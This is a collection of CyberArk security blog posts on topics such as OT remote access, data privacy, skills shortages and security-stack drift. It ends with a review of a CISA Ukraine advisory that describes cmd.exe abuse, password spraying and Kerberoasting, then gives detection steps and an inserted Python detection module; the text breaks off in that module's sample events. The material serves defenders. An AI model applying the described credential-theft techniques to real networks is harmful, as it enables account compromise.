However, with access comes risk: 80% have experienced end users misusing or abusing access to these applications in the past year. This trend comes at a time when 97% of security leaders say credential theft is on the rise, with end users who have access to sensitive resources making up the biggest increase in targets by attackers.

When potential security issues emerge, security teams typically comb through user logs — sometimes thousands of lines — in search of clues to discover what happened. But nearly half (48%) of organizations surveyed have limited ability to view these logs and audit user activity. This keeps them in the dark about potentially risky actions taken in web application sessions.

With more insight into users’ actions within sensitive business applications, security decision makers believe they’d gain a wide range of benefits. For example, 41% of those surveyed say they’d be able to identify the source of a security incident more quickly.

User Activity Visibility Benefits

But with their current limitations, organizations may be at risk from insider actions, both from honest mistakes and malicious attacks (per the above-mentioned plot of Office Space). And they may be vulnerable to external threats, such as identity compromise via phishing and credential theft.

So what can security decision makers do to improve their approach to web application security for high-risk user sessions?

It starts with asking yourself some important questions about the tools you use and the capabilities they offer. Some examples:

  • Can your team easily produce a record of what goes on during specific end-user activity in a given application?
  • If not, how much time do you lose to data log reviews, and how does that affect your window of opportunity for discovering what’s transpired?
  • As you review user activity or behavior, how confident are you that the person who initiates a web session is actually the person using the application?
  • And do you have the mechanisms in place to continuously verify a user’s identity in the event they were to walk away from their workstation?

Read our eBook The Hidden Gap in Web Application Security: User Sessions for a deep-dive look at our research findings that will help you evaluate how well — and how comprehensively — you are protecting your users’ sessions in applications that contain sensitive resources, in comparison with your peers. The eBook also provides insights to help you assess and improve your security posture.

With greater visibility, you can reframe the dreaded question “What’s happening?” into one of support, as in: “How are you doing?”

In light of the pressures today’s security practitioners are under, we could all use a lot more of that.

Let the Cybersecurity (Winter) Games Begin https://www.cyberark.com/blog/let-the-cybersecurity-winter-games-begin/ Thu, 03 Feb 2022 14:00:53 +0000 https://www.cyberark.com/?p=126957

Nothing draws people together like sporting events — we love the inspiration that comes from witnessing the best of the best — and groan together in the agony of defeat. For the athletes themselves, events like the Winter Games represent the culmination of a lifetime of dedication. And while there’s no gold medal to celebrate their hard work, cybersecurity professionals spend their careers in similar fashion to top athletes — honing their craft as they fight the good fight. That’s why even a humble couch potato can learn a few security lessons from the Games, as the determination and camaraderie of the athletes parallel cybersecurity’s team sport mentality.

As the classic movie Cool Runnings teaches us (time and again), bobsled is a sport that requires agility, control and, most importantly, teamwork. Not only must security teams work together in lockstep, but they must also collaborate closely with other business functions — such as DevOps teams — to quote the movie, “feel the rhythm, feel the rhyme.” And since leaning too far in one direction can spell disaster, security approaches must strike the right balance between protecting the business and moving at the pace of innovation.

One of the most physically demanding sports of the Games, alpine skiing combines speed and skill. Slalom skiers must traverse down a winding mountain path, passing through gates positioned on alternating sides. Missing a gate can lead to disqualification. It’s a concept well understood by cyber attackers: to reach an intended target — the “finish line” — they must use hijacked privileged credentials to get through “gated” areas and unlock higher levels of access. Defenders understand that when an attacker inevitably barrels down the mountain, blocking this privilege progression is the best way to protect valuable assets from harm.

Like the figure skaters who weave together strength and beauty, cybersecurity threat researchers toe the line between science and art. Researchers have their own unique style and approach to problem solving, and sometimes the data they gather requires interpretation to work through various shades of grey. Analytics help them map connections, model threats and paint a comprehensive picture of the landscape.

Sometimes referred to as “chess on ice,” curling requires a great deal of strategy and patience to overcome the opponent. Cybersecurity requires the same mindset, with security teams thinking moves ahead, slowing attackers’ progression down the board and blocking access to valuable corporate assets. A mistimed or ill-aimed stone or an unprotected or misconfigured privileged account could give the opposing team the advantage and, ultimately, place you in checkmate.

Skeleton is one of the fastest-paced sports at the Games, with a single athlete sliding headfirst down an icy track at speeds of 80 miles per hour or higher on a tiny sled. In a DevSecOps-enabled business, DevOps is the “sled” you jump into to develop, test and release new innovations with agility and speed to meet fast-evolving customer needs. But the smallest detail, like the angle of a turn on the track or a mismanaged secret, can slow things down or even result in a multi-sled pileup (or a ripple effect down a supply chain). Shifting left to build security into development workflows can make the run as smooth as possible without sacrificing the speed you need to win.

Nothing depicts a Red Team vs. Blue Team exercise better than hockey. Much like red teams, forwards are laser-focused on scoring goals — often by whatever means possible. Adversarial simulations help these teams think like their opponents to outscore them. And like hockey defensemen stopping opponents from gaining the zone, Blue Team cyber defenders need a high degree of skill paired with hyper vigilance to close gaps and block shots.

Short track speed skating offers an extra layer of excitement with pack starts. Crashes are common as skaters jockey for position, hoping to pace themselves just right to end the race in first place. Security Operations Center (SOC) teams work in “short track” environments, where things can change in fractions of a second as analysts triage threats from all angles. Like a skater determining the best time to push ahead, SOC analysts must stay cool under pressure, quickly prioritizing and responding to the riskiest security events.

Snowboarding combines athleticism with the creativity of skateboard tricks. Sometimes the prevailing conditions on the halfpipe can affect an athlete’s performance — requiring adaptation midair. In the world of cybersecurity, adversaries are constantly adapting their methods, and security teams must be just as agile and creative to stay ahead. One thing is certain on the halfpipe and on security’s front lines: no two flight paths are ever the same.

The world-class athletes we see at the Games have gone through years of intensive training and preparation. Likewise, security defenders must prepare to stay on the edge of threat research trends, continuously advance their skills and race against time to outthink and outsmart attackers to win gold.

Secure Third-Party Access to Protect Water Systems and Critical Operational Technology https://www.cyberark.com/blog/secure-third-party-access-to-protect-water-systems-and-critical-operational-technology/ Wed, 02 Feb 2022 20:17:26 +0000 https://www.cyberark.com/?p=126856

82 gallons: that’s how much water the average American uses each day. While we should all attempt to minimize our consumption, it’s easy to take the availability of clean, safe water for granted — from brewing that first pot of coffee in the morning to ending the day with a shower. Yet just like the other critical systems that make modern life possible, the IT infrastructure that water treatment plants and related systems rely on is not only aging, but is also under pressure to become more connected, reliant on automation and maintained through remote connections. For these reasons, as the past several years have demonstrated, this infrastructure is also an attractive target in cyber attacks.

Last week, the Biden administration unveiled a 100-day cybersecurity plan for U.S. water utility operators and extended its Industrial Control Systems (ICS) Cybersecurity Initiative to the sector in response to a spate of recent attacks. The plan focuses on establishing a task force of water sector leaders, bolstering security incident monitoring capabilities, improving information sharing and data analysis, and providing technical support for water systems.

Global Water Systems Under Attack

In February 2021, attackers breached a Florida water treatment plant, gained control of its SCADA system and successfully raised the sodium hydroxide level in the water 100-fold, to a poisonous concentration. Later in the year, U.S. federal agencies issued a joint advisory warning of ongoing threats to water and wastewater systems, citing several phishing and ransomware attacks on facilities in California, Maine and Nevada, among others.

Vulnerable water systems are a global issue: in 2020, Israel experienced a major attempted attack on its water infrastructure, and the U.K. has warned of “credible threats” to its critical infrastructure, including the water sector. A 2021 SANS Institute study paints a troubling picture: one in 10 wastewater plants has a critical security vulnerability today.

As operational technology (OT) assets are increasingly connected to IT networks, remote access to these critical systems is now the norm. Since the pandemic began, critical infrastructure operators — from water treatment plants to oil pipelines — must focus on protecting privileged access to the applications and systems that are responsible for keeping this infrastructure up and running.

Operational Technology: Connected, But Not Adequately Protected

Traditionally, industrial control systems and process and production equipment were not connected to a network. Modifications to OT environments could only be performed through in-person physical interaction with system controls (pulling levers, flipping switches and turning dials). So, security risks were limited to the people who had direct access to the facility. But as digitalization and IoT adoption accelerated, many OT environments, full of decades-old technology, were brought online. Today, OT and IT networks are becoming increasingly interconnected. This increases the attack surface for industrial organizations by increasing the number of sensitive systems online. All access to these systems must be treated as privileged access, something attackers consistently seek out to execute their plans.

Meanwhile, business requirements and pandemic-driven safety concerns have forced many organizations to adapt jobs that traditionally required physical presence at the facility to a remote model. As a result, internal and third-party personnel responsible for operating, troubleshooting, upgrading and maintaining OT equipment often do so remotely.

The U.S. Department of Homeland Security (DHS) provides examples of identities that may legitimately require remote access to control systems. These include, but are not limited to, internal employees — such as systems operators, maintenance engineers and field technicians — and external parties — such as vendors, business partners, systems integrators, MSPs and regulatory entities. To help ensure safe, continuous operation of water, wastewater and other OT facilities, all such identities need secure remote access to systems. However, provisioning standing (or ‘always on’) privileged access to critical devices and systems in OT environments can heighten the risk of credential theft.

The SANS 2021 Survey: OT/ICS Cybersecurity identified external remote services as the most frequent attack vector involved in OT/control systems incidents. Similarly, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) cites access as one of the most prevalent IT and OT weaknesses and risks.

Insecure Remote Access Puts OT Systems at Risk

Considering how disruptive a cyber intrusion can be in OT environments like water facilities, the importance of treating all vendors and employees with remote access as privileged identities — and protecting their access accordingly — cannot be overestimated. Unfortunately, risky security practices are far too common, such as:

  • Sharing administrator credentials for SCADA and other critical systems
  • Provisioning third parties with standing access rights in corporate directories
  • Failing to securely store, manage and distribute credentials — including those for air-gapped systems
  • Using the same passwords for multiple accounts
  • Giving operators and maintenance personnel administrator-level access to critical systems they do not regularly access
  • Providing unrestricted, anytime access to sensitive resources
  • Improperly air-gapping systems, exposing systems to the internet unnecessarily or using an unsecured local area network
  • Running outdated, unpatched operating systems and software

The 2021 Florida water plant attack highlighted several of these issues, specifically around weaknesses in remote access. According to reports, all computers used by plant personnel to access the SCADA system for water treatment had remote access and a shared password, despite the sensitivity of the required operations.

Many OT environments and water facilities disconnect — or “air-gap” — systems from the internet for security purposes. Even in air-gapped OT environments, securing remote access remains vital. Plant equipment, HMI, DCS, PLC and other OT systems still require maintenance and upgrades performed by internal staff and, oftentimes, external contractors. In these situations, privileged credentials used to access critical systems must be provisioned securely and carefully monitored. Yet too many organizations still share passwords through antiquated means, such as Excel files kept on shared systems.

Protect Privileged Access to Address Most Prevalent OT Weaknesses

Fortunately, Identity Security solutions, centered on privileged access management, can provide offline privileged access, eliminating the issue of credential sprawl, no matter the environment. Internal admins and third-party contractors can retrieve privileged credentials and maintain session audit via mobile apps, helping organizations defend against attacks targeting credential theft while satisfying audit and compliance.

By enabling secure third-party access as part of a Zero Trust approach to security, industrial control organizations can help address the most prevalent identity-related weaknesses and risks identified by CISA:

Identity Related IT and OT Weaknesses

Of course, strengthening controls on remote access is one of many critical steps toward greater cyber resilience. Today’s utility organizations are often under-resourced. OT systems are aging and straining from decades of use. Skilled cybersecurity practitioners are increasingly hard to find. And industry regulations remain inconsistent (at best). It’s encouraging to see our water systems and other critical infrastructure getting the increased cybersecurity attention they so desperately need — but we still have a long way to go.

Learn more about secure remote access and Privileged Access Management for OT and IT environments in the CyberArk resources library, and take the first step to secure remote vendor access in an interactive tour of CyberArk Vendor Privileged Access Manager.

]]>
Protect Your Personal Information this Data Privacy Day https://www.cyberark.com/blog/protect-your-personal-information-this-data-privacy-day/ Thu, 27 Jan 2022 14:00:07 +0000 https://www.cyberark.com/?p=126564

Every day, millions of people are duped into sharing personal information online that they shouldn’t. Maybe they’re unclear about how data is collected and used in our digital society, maybe they’re distracted or maybe they’re so used to getting emails from their bank that they fill out one of those we-need-to-update-your-information requests without a second thought.

Even the most discerning online users get caught off guard by social engineering schemes that seem totally legitimate. Just a few weeks ago, that banking spoof happened to one of my own security-conscious family members.

Raising awareness about these common attack tricks, educating citizens on ways to protect their personal information and encouraging more transparency from businesses that collect customer data are the goals of Data Privacy Day 2022. This international initiative is observed on January 28 in the United States, Canada, Israel and 47 European countries (where it’s known as Data Protection Day).

How You Can Protect Your Most Valuable Data

Every time you, as a consumer, set up a new online account or application, you’re asked for personal details that are often beyond what the service provider needs, such as geographic location and access to your contacts list, photo albums and more. Each bit of information provides valuable insights about you — for both the service provider and would-be attackers — and should be shared with discretion and care. The National Cybersecurity Alliance has a great list of tips for managing your privacy settings on popular online accounts and personal devices.

Of course, there are plenty of instances when consumers do not have a say in the matter: online fraud is rampant, and just last year there were over 450,000 reported instances of credit card fraud. The good news is it’s become easier to cancel a credit card or alert your bank that your account may have been compromised.

What’s more difficult to get past is an attack on your personal identity — on the things that make you you: your name, the day you were born, your address, your social security number. An attack on your identity could mean someone taking out a credit card or a loan in your name and running up debt, for example. This could negatively impact your credit score, then down the road, your ability to buy a car, activate a cell phone, take out a mortgage and more.

One of the reasons attackers have become so successful at tricking individuals into disclosing personal information is the specificity of their attempts. They work hard to get to know you and your everyday habits before making their move, like where you bank and which cable company or energy supplier you use.

My family member’s bank email spoof was a textbook example of this. Another happened to a friend who received a “number spoof” call from someone pretending to be from his child’s gymnastics school – quite a personal and specific context. The attacker used the gym’s legitimate number on caller ID to attempt to gain familiarity and trust to attempt to obtain banking information unethically.

Unfortunately, the pandemic only exacerbated the problem. With so many people working remotely, spending more time online and in many cases, switching between devices and personal and public WiFi services, bad actors found fertile ground for social engineering attacks.

Even though they’ve evolved their tactics in the face of opportunity, they’re still using con artist tricks that have worked for ages. They’re just trying to make us do what we wouldn’t normally do by using details or bits of information to lull us into panicking or letting our guard down. The old techniques haven’t gone away — they’ve just had a boost from technology.

Identity is the New Currency and Should be Treated as Such

Some things just go better together, like peanut butter and jelly, or data privacy and data security. There are some simple — yet highly effective — ways to secure your personal data in daily life. And in a lot of ways, they mirror basic practices embodied in the Zero Trust security model many enterprises follow today. In honor of Data Privacy Day, consider taking these proactive steps on January 28:

  • Change all your passwords, make sure they are strong (25+ characters) and use a unique password for everything. Repeating the same password for multiple devices or services just gives attackers more room to move.
  • Activate multi-factor authentication (MFA) whenever you can — especially on accounts containing sensitive information about your personal identity.
  • If you’ve got an iPhone, you can use the password wallet. Also consider using a password manager to help secure your personal passwords for various accounts. That way, you never have to save credentials in your browser, since attackers have many clever ways to capture them there.

Even if someone is trying to use your personally identifiable information (PII), setting up these password roadblocks will help mitigate some of the damage that can be done.

Of course, individuals aren’t the only ones who need to change their attitudes and behaviors around data privacy. Organizations also need to be more diligent about protecting customer data — especially PII — by regularly assessing data practices, adhering to industry and government regulations and enhancing transparency around what type of data is collected and for what purpose.

Protecting what makes you you requires vigilance and a collective effort to emphasize and protect the true value and privacy of personal data. Only then can we mitigate attackers’ power and defang their tricks — whether old or new.


]]>
CyberArk CHRO on Bridging the Cybersecurity Skills Gap https://www.cyberark.com/blog/cyberark-chro-on-bridging-the-cybersecurity-skills-gap/ Tue, 25 Jan 2022 14:00:41 +0000 https://www.cyberark.com/?p=126544

As cyber attacks continue to grow in frequency and scale, demand for qualified professionals far outweighs supply, fueling a fiercely competitive talent war. Amplified by the pandemic, this worldwide cybersecurity talent shortage has far-reaching implications for organizations’ ability to protect against evolving threats. We asked CyberArk Chief Human Resources Officer Ruth Shaked to share her perspectives on ways to address this growing challenge.

Prioritize Your People’s Priorities

“Where, when, how and even why people work has changed. To protect and grow your organization’s greatest asset — your team — and remain competitive, your cultural practices must change too,” Shaked says. In a word, they’ve got to get flexible. This is true for cybersecurity professionals and knowledge workers across industries and functions.

A 2021 Microsoft survey of more than 30,000 workers in 31 countries found 70% of people want flexible remote work options to continue, while over 65% are craving more in-person time with their teams. Bottom line: people want options, and hybrid work is here to stay.

The same study found 39% of employees feel exhausted. And in the fast-paced world of cybersecurity, these burnout rates are even higher: according to a 2020/2021 Chartered Institute of Information Security (CIIS) State of the Profession report, 54% of cybersecurity professionals admitted they had either left a job due to overwork or burnout or have worked with someone who has. To reverse this trend, flexible work models must not only take employees’ physical wellbeing into account but also their mental health and social and intellectual well-being.

The way employees “climb the corporate ladder” is also shifting away from a linear approach that can limit the development of new skills, exposure to diverse ideas and meaningful contribution opportunities. Corporate structures are moving toward more flexible “lattice” models that support mobility in multiple directions and across various functional areas within the organization, better reflect workers’ priorities and values, and bolster employee satisfaction and retention.

Focusing on your people’s priorities is not only the right thing to do; it’s also good for business. “Happy, healthy employees provide best-in-class service, deliver greater innovation and ultimately drive success,” Shaked says.

“Where, when, how and even why people work has changed. To protect and grow your organization’s greatest asset — your team — and remain competitive, your cultural practices must change too.”

– Ruth Shaked, CyberArk Chief Human Resources Officer

Give Teams the Training and Tools Needed to Succeed

While attackers continue to innovate, technology is changing at a rapid pace. “It’s no surprise that cloud security tops the list of professional development priorities for the next two years,” Shaked says, referencing a 2021 (ISC)2 Cybersecurity Workforce Study. “Closing the gap requires greater investment in training and development, while giving over-worked and over-stressed security professionals the time they need to actually take advantage of these programs,” she continues. “Intensive boot camp-style training courses are great options for people with the right aptitude, right attitude, curiosity and willingness to learn.”

One potentially overlooked way to address these gaps is by conducting cybersecurity training for non-security teams. Shaked points to CyberArk’s own internal program as an example. “One of the goals of the program is to train our developers in secure coding practices, teaching everything from threat modeling and cryptography to penetration testing. This helps to promote our security-first culture, while creating a new growth path for developers,” she says.

Technology can also play a supporting role in addressing shortages and freeing up time for workers to learn new cybersecurity skills, reskill or upskill. The same (ISC)2 workforce study found that in the next year, organizations plan to increase their use of cloud service providers (38%) and intelligence and automation for manual cybersecurity tasks (37%).

Create a Diverse and Inclusive Culture

A diverse, inclusive work environment is proven to foster innovation, inspire people, deepen engagement and ultimately, improve retention. “As competition escalates for skilled cybersecurity workers, employees both expect and seek out evidence of their employer’s commitment to workplace diversity, equity and inclusion (DE&I),” Shaked says.

Building a culture of representation and belonging is a top priority for Shaked and the entire leadership team at CyberArk, and she notes that ongoing employee communication and feedback has helped deepen their focus and drive continuous improvement. “DE&I is fundamental to our core CyberArk values — one of which is ‘We,’ which means always engaging respectfully with others and always acting as a team player.”

She continues, “We’ve rolled out a global employee diversity training program built on three core pillars: authenticity, which means doing what we say we will do; accountability for enabling an inclusive culture; and awareness of inclusive behaviors, practices and processes.” As part of this, all employees participate in training courses that explore topics such as supporting allyship, overcoming unconscious bias and embracing inclusive behaviors. Other aspects of the program include formal inclusive recruiting certification for talent acquisition personnel, diversity coaching workshops for leadership teams and special initiatives tied to local and global days of diversity, such as PRIDE Month and Chinese New Year.

CyberArk’s ongoing participation in, and sponsorship of, organizations such as Partnership Inc. and TRIBE Academy reinforce the company’s commitment to hiring and celebrating employees across unique cultures, experiences, backgrounds and identities. As Shaked puts it, “Inviting people to the dance is not good enough. We need to invite everyone to dance.”

Elevate Women in Cybersecurity

One clear way to foster workplace diversity is attracting more women to cybersecurity — a field in which women have long been underrepresented. This is a topic particularly near and dear to Ruth. “We need to bring more women’s voices and perspectives to the table — especially in cybersecurity leadership positions,” she says.

Providing professional development, coaching, mentorship and network building opportunities is key to elevating women within their organizations. At CyberArk, Shaked is particularly proud of CYBRWomen, a recently launched employee resource group designed by women, for women. She explains, “CYBRWomen’s mission is to recognize and empower our incredible women here at CyberArk. This global community is a safe space to come together, support one another, promote female-driven ideas and innovation and help women achieve their professional goals.”

“Inviting people to the dance is not good enough. We need to invite everyone to dance.”

– Ruth Shaked, CyberArk Chief Human Resources Officer

Encouraging women to explore cybersecurity career paths during college is also an important step in addressing the talent shortage, Shaked notes. CyberArk’s partnership with Wentworth University to offer scholarships to women enrolled in cyber studies and other STEM careers is one initiative supporting that goal. And to attract women entering the profession or exploring new opportunities, organizations must prioritize inclusive hiring practices that consider women, along with flexible work options that promote work-life balance.

Inspire the Next Generation of Cybersecurity Leaders

Raising awareness about cybersecurity careers requires collaboration across enterprises and educational institutions, out-of-the-box thinking and an early start. For instance, researchers are teaching virtual reality-based cybersecurity lessons to K-12 students using a familiar method: video games. And speaking of familiar, TikTok — one of the world’s most popular social platforms — is working to promote content aimed at getting kids interested in cybersecurity and privacy careers. Meanwhile, cybersecurity apprenticeship and internship programs (such as those offered by CyberArk) are helping college students develop skills on the job, while supporting more diverse candidates.

“If this world fascinates you, learn as much as you can,” encourages Shaked. “When it comes to cybersecurity, the sky’s the limit. Maybe coding isn’t your thing, but there’s also a need for creative individuals looking to tackle new challenges, for those with strong communication and management skills — there are so many different paths under the cyber umbrella to choose from.” She suggests taking a spin through this National Initiative for Cybersecurity Careers and Studies (NICCS) list of cybersecurity career profiles, as well as CyberArk’s own career page, to help students and individuals considering a career change get a better understanding of their options.

As with the field of cybersecurity itself, there’s no silver bullet — no single solution — that will fix this worldwide skills shortage. But by focusing on employee empowerment and growth, DE&I-centric people practices and awareness building at critical steps along students’ educational journey, organizations can serve as powerful engines for change.

]]>
7 Steps to Keep Cybersecurity Systems from Drifting https://www.cyberark.com/blog/keep-cybersecurity-systems-from-drifting-in-7-steps/ Fri, 21 Jan 2022 14:00:36 +0000 https://www.cyberark.com/?p=126534

Years ago, American writer and futurist Alvin Toffler described technology as “the great growling engine of change.” This is as true today as it ever was: enterprise IT infrastructures are growing and interconnecting rapidly, spanning on-premises data centers, disparate workforces and, in many cases, multiple clouds.

Technology Change Brings Inevitable Drift

The application and infrastructure components within these enterprise technology environments need to be adjusted regularly to better support internal users and enable product improvements. As ad-hoc updates are made, technology systems can slowly start to move apart — especially when changes aren’t documented consistently — sometimes leading to system failures and costly outages. Similar issues arise frequently in cloud and DevOps environments, in which change is constant. Piecemeal configurations and updates can create problems and over time, drive up technical debt — the implied cost of future re-work to fix issues that weren’t addressed at the start.

This phenomenon — known as “drift” in tech circles — is common and can happen to even the most well-meaning practitioners. To help keep systems aligned, configuration management tools are often used to automate change management tasks.

Is Your Security Stack Drifting Apart?

Cybersecurity is one functional area that isn’t often associated with drift. Yet the systems built to protect digital enterprise networks can also slip off kilter. Left unchecked, this can negatively impact system performance and expose organizations to risk.

A typical enterprise deploys about 45 different tools as part of its “cybersecurity stack,” with each solution playing a role in defending the organization’s IT environment. Of course, this “stack” isn’t a physical stack at all. Instead, it’s a complex web of layered security controls that, increasingly, are delivered as a service and extend beyond the network perimeter to encircle individual users and their devices.

As these security stacks evolve to keep pace with internal change, hybrid workforce requirements and emerging cyber threats, system changes — albeit necessary — can drive inconsistencies, dissonance and drift.

While they all should look familiar, it’s important to revisit security fundamentals periodically, making sure protections you’ve put into place cover everything — including your security deployments themselves.

7 Best Practices for Minimizing Drift and Protecting Your Cybersecurity Solutions

1. Whenever possible, reduce the number of privileged accounts and/or the extent of their privileges to reduce the attack surface. Clearly define how sysadmins and other highly privileged users, as well as applications, should access security systems via privileged accounts — and under what conditions. Following this foundational practice of least privilege security applies to everything in your IT environment, including your cybersecurity solutions. If your team relies on configuration management tools to help keep drift at bay, remember that privileged access to them should be managed, monitored and controlled following the principle of least privilege.

2. Enforce multi-factor authentication (MFA) for accessing your security deployments for all users, including product administrators, to help mitigate common credential theft techniques such as keystroke logging and plaintext password harvesting.

3. Many cybersecurity infrastructure components are highly sensitive and should be treated as Tier 0 assets. As part of this, tightly restrict access to component servers. Start by following Microsoft’s best-practices for mitigating pass-the-hash attacks and other credential theft.

4. Establish a “normal” baseline for system activity. Take advantage of analytics to model baseline behaviors and benchmark risk levels. This will help speed the detection of anomalies and indicators of compromise (IOCs), such as a privileged user who suddenly accesses credentials at an unusual time of day or from an unusual location, demonstrates excessive usage or follows other abnormal trends.

5. To detect problems early, it is also essential to monitor and review the logs generated by both the security solutions and the infrastructure on which they run. The most effective approaches will apply analytics to enable automatic response to high-severity incidents — blocking in-progress attacks on critical systems and reducing the impact of any issue, whether security or operational.

6. The use of insecure protocols can easily render other security controls invalid. To reduce the risk of eavesdropping and other network-based attacks, use encrypted and authenticated protocols for all communications such as LDAPS and TLS.

7. Even with extensive controls and best practices in place, security system outages may occur. Having a documented disaster recovery plan is a must. The plan should specifically take your security deployments into account and be tested yearly (at minimum) to see how quickly your organization can recover data and restore operations. Remember that practice makes perfect.

While not a comprehensive list, these recommendations reflect our CyberArk team’s experience in helping customers implement industry best practices, drawing on deep experience as a Trusted Advisor to organizations around the world.

Looking for a place to start? Consider conducting a Red Team adversary simulation to identify places where drift could be putting you at risk.

As long as the great growling engine that is technology keeps changing, so must security. As your organization matures its cybersecurity strategy this year, start out strong by making sure the tools within your security stack are protected. This will help validate that the controls you’ve already implemented have not drifted and are working as expected to thwart threat actors and protect what matters most.


]]>
CISA on Ukraine Cyber Attacks: Are You at Risk? https://www.cyberark.com/blog/cisa-on-ukraine-cyber-attacks-are-you-at-risk/ Wed, 19 Jan 2022 14:00:35 +0000 https://www.cyberark.com/?p=126476 Ukraine Attacks CISA Advisory

Reports of a large-scale cyber attack targeting Ukrainian organizations and several government department websites have emerged in recent days. In response, the Cybersecurity & Infrastructure Security Agency (CISA), National Security Agency (NSA) and Federal Bureau of Investigation (FBI) issued a joint advisory to help organizations better understand the threats posed by nation state attackers and mitigation steps to build cyber resilience.

The authors urge defenders — particularly those in critical infrastructure sectors — to be prepared and stay vigilant. This is especially true as evidence of a new wiper malware emerged over the weekend, targeting Ukrainian organizations. While this guidance comes from U.S. government agencies, it is applicable to organizations around the world.

CyberArk Labs and Red Team conducted a technical review of the advisory to recommend event detection and risk mitigation best practices.

Is My Organization at Risk? How to Investigate a Potential Incident

Based on reports of the Ukraine attacks, the intruders were able to execute a start-to-finish compromise by stealing credentials, using the command interpreter and leveraging password stores, to name just a few of their methods. Fortunately for defenders, the attackers triggered numerous red flags — also known as indicators of compromise (IOCs) — along the way.

The CISA advisory outlines tactics, techniques and procedures (TTPs) used by nation state-sponsored advanced persistent threat (APT) actors, based on the MITRE ATT&CK framework. We will focus on three key categories: Execution, Persistence and Credential Access. If you believe your organization has been targeted in an APT-style attack, CyberArk recommends following these investigative steps to spot IOCs throughout the attack chain, gauge risk severity and respond quickly.

Execution

In this stage, the attackers used CMD.exe and PowerShell to execute commands and tasks on remote machines.

IOCs
  • Often when cmd.exe is used to execute remote commands, we see it invoked with the “/c” switch. These executions are uncommon enough that we can successfully sift through them.
  • The user creating the cmd.exe is relevant as well. Often, we won’t see the SYSTEM user creating cmd.exe shells.
  • The parent process tree here can be incredibly useful. You will usually see cmd.exe run as a child of certain processes, such as explorer.exe when a user double-clicks it. If a strange parent is spotted, this can be a great IOC for monitoring.
Detection Steps
  • Windows Event Logs event ID 4688 can provide new process creations as well as their command line arguments. We can monitor all cmd.exe /c executions with this event ID, as well as the additional arguments to identify potential malicious activity.
  • The same event ID provides the user creating the process. Use this to monitor for suspicious users accessing cmd.exe.
  • It also provides the parent process that created the new process. Use this to find strange parent processes creating cmd.exe, such as outlook.exe.

Persistence

As they worked to establish persistence, the attackers were observed obtaining credentials through several different mechanisms.

Brute force password attacks. Attackers conducted brute-force password guessing and password spraying campaigns to see which credentials would obtain valid access.

IOC
  • A large number of logon failures from a single user, or many logon failures across the organization in quick succession.
Detection Steps
  • Alerts can be generated for this by observing for many failed logon events using Windows Event ID 4625.


Kerberoasting. Kerberoasting is when a single user requests service tickets for service accounts within the domain in order to brute-force the service accounts’ passwords back to plaintext, then uses the account and its permissions directly within the network.

IOCs
  • During a kerberoast, attackers will often attempt to do a downgrade from AES to RC4 to get a value that will be easier to brute force.
  • Attackers will often target all service accounts within a domain, which will generate large numbers of requests for a single user.
Detection Steps
  • Windows Event ID 4769 provides details on new Kerberos service tickets being granted. Observing the “Ticket Encryption Type” parameter, detections can be generated on DES (0x1 and 0x3) and RC4 (0x17 and 0x18) encryption types for further review.
  • Observe many service ticket requests for a single user via Windows Event ID 4769 across multiple services within a short time frame; users generally aren’t authenticating to 10+ services at once.
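One way to turn the Execution, brute-force and Kerberoasting detection steps above into code, as an added example that is not CyberArk’s own: the event records are constructed stand-ins for the named Windows Security events, and the parent-process allow list and thresholds are assumptions to tune per environment.

```python
"""Detection logic for the Execution (4688), brute-force (4625) and Kerberoasting (4769)
IOCs described above. Added example, not CyberArk's code; the records are constructed
stand-ins for Windows Security events, keyed by their EVTX XML data names."""
from collections import defaultdict
from datetime import datetime, timedelta

# Parents that normally spawn cmd.exe in this (assumed) environment; tune per site.
EXPECTED_CMD_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "conhost.exe"}
# Ticket encryption types named in the text: DES 0x1/0x3 and RC4 0x17/0x18.
WEAK_TICKET_ETYPES = {0x1, 0x3, 0x17, 0x18}


def _max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def suspicious_cmd_executions(events):
    """4688: cmd.exe /c launched by an unexpected parent or as SYSTEM."""
    hits = []
    for e in events:
        if e["EventID"] != 4688 or not e["NewProcessName"].lower().endswith("\\cmd.exe"):
            continue
        if "/c" not in e.get("CommandLine", "").lower().split():
            continue
        parent = e.get("ParentProcessName", "").lower().rsplit("\\", 1)[-1]
        reasons = []
        if parent not in EXPECTED_CMD_PARENTS:
            reasons.append(f"unexpected parent {parent}")
        if e.get("SubjectUserName", "").upper() == "SYSTEM":
            reasons.append("spawned as SYSTEM")
        if reasons:
            hits.append((e["TimeCreated"], e["SubjectUserName"], e["CommandLine"], reasons))
    return hits


def failed_logon_bursts(events, threshold=10, window=timedelta(minutes=5)):
    """4625: failure bursts per target user, plus organisation-wide under the key '*'."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            per_user[e["TargetUserName"].lower()].append(datetime.fromisoformat(e["TimeCreated"]))
    everyone = [t for ts in per_user.values() for t in ts]
    alerts = {}
    for key, times in list(per_user.items()) + [("*", everyone)]:
        n = _max_in_window(times, window)
        if n >= threshold:
            alerts[key] = n
    return alerts


def kerberoast_indicators(events, service_threshold=10, window=timedelta(minutes=5)):
    """4769: weak ticket encryption, and one user requesting many distinct services at once."""
    weak, requests = [], defaultdict(list)
    for e in events:
        if e["EventID"] != 4769:
            continue
        etype = int(e["TicketEncryptionType"], 16)
        if etype in WEAK_TICKET_ETYPES:
            weak.append((e["TargetUserName"], e["ServiceName"], hex(etype)))
        requests[e["TargetUserName"].lower()].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    bulk = {}
    for user, reqs in requests.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= service_threshold:
                bulk[user] = max(bulk.get(user, 0), len(services))
    return weak, bulk


# Constructed sample: a benign cmd.exe, one spawned by Outlook, a password spray
# against svc-backup, an RC4 ticket and a burst of AES tickets for one user.
CMD = "C:\\Windows\\System32\\cmd.exe"
SAMPLE_EVENTS = [
    {"EventID": 4688, "TimeCreated": "2022-01-18T09:01:00", "SubjectUserName": "alice",
     "NewProcessName": CMD, "ParentProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"EventID": 4688, "TimeCreated": "2022-01-18T09:02:00", "SubjectUserName": "alice",
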